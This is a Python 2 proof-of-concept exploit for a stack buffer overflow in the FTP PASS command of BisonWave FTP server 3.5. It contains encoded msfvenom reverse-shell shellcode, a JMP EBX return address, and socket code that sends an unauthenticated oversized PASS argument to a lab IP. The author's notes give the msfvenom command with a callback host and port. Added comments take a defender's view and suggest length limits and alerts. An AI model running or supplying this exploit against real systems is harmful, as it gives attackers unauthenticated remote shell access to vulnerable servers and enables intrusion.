Exploit BisonWave FTP server v.3.5
#!/usr/bin/python
# Proof-of-concept for a stack buffer overflow in the FTP PASS command
# handler (see the author's mona / pattern_offset notes at the bottom).
# Written for Python 2: the payload is assembled as a str and handed to
# socket.send() as raw bytes.
#
# Defender's view of what the code below shows:
#   * the overflow is reached right after "USER anonymous", i.e. no valid
#     credentials are needed;
#   * the trigger is a single PASS argument of 1159 bytes
#     (1115 + 40 + 4, see the `buffer` line), far beyond any legitimate
#     password, so a length limit on the PASS argument -- and an alert on
#     oversized FTP command lines -- both blocks and detects this input.
import socket,time
#jump memory code
# 40-byte region placed just before the saved return address: eight 3-byte
# instructions followed by the 2-byte "\xff\xe3" (JMP EBX according to the
# author's note below). The 3-byte prefix presumably adjusts EBX before the
# jump -- confirm with a disassembler.
jmp = "\x83\xEB\x32"*8
jmp += "\xff\xe3"
#exploit code
# Encoded msfvenom shellcode (windows/shell_reverse_tcp, see the command
# line at the bottom). Bytes excluded by the encoder: NUL, LF, CR, space
# and '@' ("\x00\x0a\x0d\x20\x40").
buf = ""
buf += "\xbe\xa8\x9a\x2c\x48\xda\xce\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x52\x83\xed\xfc\x31\x75\x0e\x03\xdd\x94\xce"
buf += "\xbd\xe1\x41\x8c\x3e\x19\x92\xf1\xb7\xfc\xa3\x31\xa3"
buf += "\x75\x93\x81\xa7\xdb\x18\x69\xe5\xcf\xab\x1f\x22\xe0"
buf += "\x1c\x95\x14\xcf\x9d\x86\x65\x4e\x1e\xd5\xb9\xb0\x1f"
buf += "\x16\xcc\xb1\x58\x4b\x3d\xe3\x31\x07\x90\x13\x35\x5d"
buf += "\x29\x98\x05\x73\x29\x7d\xdd\x72\x18\xd0\x55\x2d\xba"
buf += "\xd3\xba\x45\xf3\xcb\xdf\x60\x4d\x60\x2b\x1e\x4c\xa0"
buf += "\x65\xdf\xe3\x8d\x49\x12\xfd\xca\x6e\xcd\x88\x22\x8d"
buf += "\x70\x8b\xf1\xef\xae\x1e\xe1\x48\x24\xb8\xcd\x69\xe9"
buf += "\x5f\x86\x66\x46\x2b\xc0\x6a\x59\xf8\x7b\x96\xd2\xff"
buf += "\xab\x1e\xa0\xdb\x6f\x7a\x72\x45\x36\x26\xd5\x7a\x28"
buf += "\x89\x8a\xde\x23\x24\xde\x52\x6e\x21\x13\x5f\x90\xb1"
buf += "\x3b\xe8\xe3\x83\xe4\x42\x6b\xa8\x6d\x4d\x6c\xcf\x47"
buf += "\x29\xe2\x2e\x68\x4a\x2b\xf5\x3c\x1a\x43\xdc\x3c\xf1"
buf += "\x93\xe1\xe8\x56\xc3\x4d\x43\x17\xb3\x2d\x33\xff\xd9"
buf += "\xa1\x6c\x1f\xe2\x6b\x05\x8a\x19\xfc\xea\xe3\x38\xfa"
buf += "\x82\xf1\x3a\x03\xe8\x7f\xdc\x69\x1e\xd6\x77\x06\x87"
buf += "\x73\x03\xb7\x48\xae\x6e\xf7\xc3\x5d\x8f\xb6\x23\x2b"
buf += "\x83\x2f\xc4\x66\xf9\xe6\xdb\x5c\x95\x65\x49\x3b\x65"
buf += "\xe3\x72\x94\x32\xa4\x45\xed\xd6\x58\xff\x47\xc4\xa0"
buf += "\x99\xa0\x4c\x7f\x5a\x2e\x4d\xf2\xe6\x14\x5d\xca\xe7"
buf += "\x10\x09\x82\xb1\xce\xe7\x64\x68\xa1\x51\x3f\xc7\x6b"
buf += "\x35\xc6\x2b\xac\x43\xc7\x61\x5a\xab\x76\xdc\x1b\xd4"
buf += "\xb7\x88\xab\xad\xa5\x28\x53\x64\x6e\x48\xb6\xac\x9b"
buf += "\xe1\x6f\x25\x26\x6c\x90\x90\x65\x89\x13\x10\x16\x6e"
buf += "\x0b\x51\x13\x2a\x8b\x8a\x69\x23\x7e\xac\xde\x44\xab"
# Layout of the PASS argument (1159 bytes in total):
#   "\x90" NOP sled, padded so that sled + shellcode == 1115 bytes
#   + shellcode
#   + "B" filler, padded so that filler + jmp stub == 40 bytes
#   + jmp stub
#   + "\x8f\xe8\xb1\x7c": little-endian 0x7CB1E88F, the system32 JMP EBX
#     address listed in the notes below. It sits at offset 1115 + 40 = 1155,
#     which matches the "pattern_offset ... 1155" note.
buffer ="\x90"*(1115 - len(buf)) + buf + "B"* (40 - len(jmp)) + jmp+"\x8f\xe8\xb1\x7c"
soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# 192.168.25.27 -> VM server ftp ip
# No timeout and no error handling: a refused or unreachable host simply
# raises and aborts the script.
soc.connect(("192.168.25.27",21))
# Presumably gives the server time to send its banner -- not verified.
time.sleep(1)
# Every reply is read into `r` but never inspected; the script does not
# check the FTP response codes before sending the next command.
r = soc.recv(2048)
soc.send("USER anonymous\r\n")
r = soc.recv(1024)
# The oversized PASS argument is the overflow trigger.
soc.send("PASS "+buffer+"\r\n")
r = soc.recv(1024)
# NOTE: the socket is never closed; it is released only at interpreter exit.
# Author's working notes (kept as written):
# helper:
# !mona find -s "\xff\xe4" -m bisonftp.exe
# 0040307D . FFE3 JMP EBX
# 7CB1E88F FFE3 JMP EBX -- system32
# crash 1200
# pattern_offset = 42356D42 -> 1155 pos
# this exploit connect in reverse shell
# change the IP ;)
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.25.6 LPORT=443 -b "\x00\x0a\x0d\x20\x40" EXITFUNC=thread -f python